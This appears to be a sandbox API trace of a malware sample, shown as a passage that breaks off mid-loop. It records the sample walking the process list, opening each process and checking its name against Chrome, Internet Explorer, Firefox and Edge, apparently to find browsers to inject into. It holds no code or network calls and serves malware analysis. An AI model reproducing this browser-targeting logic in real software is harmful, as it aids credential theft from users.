	[0246.959] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0246.960] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x9728
	[0246.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.960] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0246.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.961] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.961] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0246.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.962] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.962] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0246.963] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x972c
	[0246.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.963] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0246.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.964] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.965] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0246.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.965] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.965] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0246.967] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x9730
	[0246.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.967] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0246.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.967] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.968] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0246.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.968] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.968] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0246.970] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x9734
	[0246.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.970] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0246.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.970] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.971] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0246.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.971] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.971] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0246.972] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x9738
	[0246.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.972] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0246.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.973] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.973] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0246.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.974] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.974] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.975] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x973c
	[0246.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.975] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.976] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.976] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.976] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.977] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.978] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x9740
	[0246.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.978] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.978] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.979] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.979] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.980] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.981] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x9744
	[0246.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.982] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.982] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.983] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.983] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.983] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.983] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.984] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x9748
	[0246.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.985] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.985] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.986] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.986] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.986] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.987] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x974c
	[0246.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.988] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.988] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.989] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.989] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.989] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.990] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x9750
	[0246.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.991] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.991] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.992] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.992] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.992] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.993] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x9754
	[0246.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.994] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.994] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.995] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.995] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.999] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0247.000] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x9758
	[0247.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.000] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0247.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.001] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.001] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0247.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.001] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.002] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.003] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x975c
	[0247.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.003] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.003] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.004] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.004] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.005] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0247.006] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x9760
	[0247.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.006] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.007] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.007] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.008] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.008] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0247.009] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x9764
	[0247.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.009] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0247.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.010] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.010] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0247.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.011] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.012] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.013] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x9768
	[0247.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.013] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.014] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.014] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.015] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.015] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0247.016] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x976c
	[0247.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.016] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0247.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.017] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.017] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0247.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.017] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.018] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0247.018] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x9770
	[0247.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.018] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0247.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.019] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.019] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0247.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.019] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.020] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0247.020] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x9774
	[0247.020] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.020] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0247.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.021] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.021] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0247.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.021] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.021] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0247.022] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x9778
	[0247.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.022] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0247.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.022] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.023] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0247.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.023] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.023] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0247.024] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0247.024] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0247.025] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x977c
	[0247.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.025] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0247.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.026] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.026] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0247.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.029] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.030] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0247.031] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x9780
	[0247.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.031] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0247.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.031] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.031] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0247.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.032] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.032] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0247.033] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x9784
	[0247.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.033] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0247.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.033] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.033] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0247.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.034] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.034] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0247.035] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x9788
	[0247.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
